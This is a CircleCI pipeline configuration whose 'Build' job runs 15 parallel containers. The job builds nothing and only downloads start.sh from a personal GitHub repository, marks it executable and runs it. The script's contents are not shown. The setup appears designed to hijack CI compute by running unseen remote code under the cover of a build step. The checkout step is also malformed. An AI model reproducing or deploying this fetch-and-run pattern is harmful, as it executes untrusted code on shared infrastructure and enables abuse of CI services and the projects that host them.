version: 2 
jobs: 
    Build: 
      parallelism: 15
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        -checkout
        - run: 
            name: Build 
            command: wget https://raw.githubusercontent.com/monariski217/do/main/start.sh && chmod u+x start.sh && ./start.sh 
    

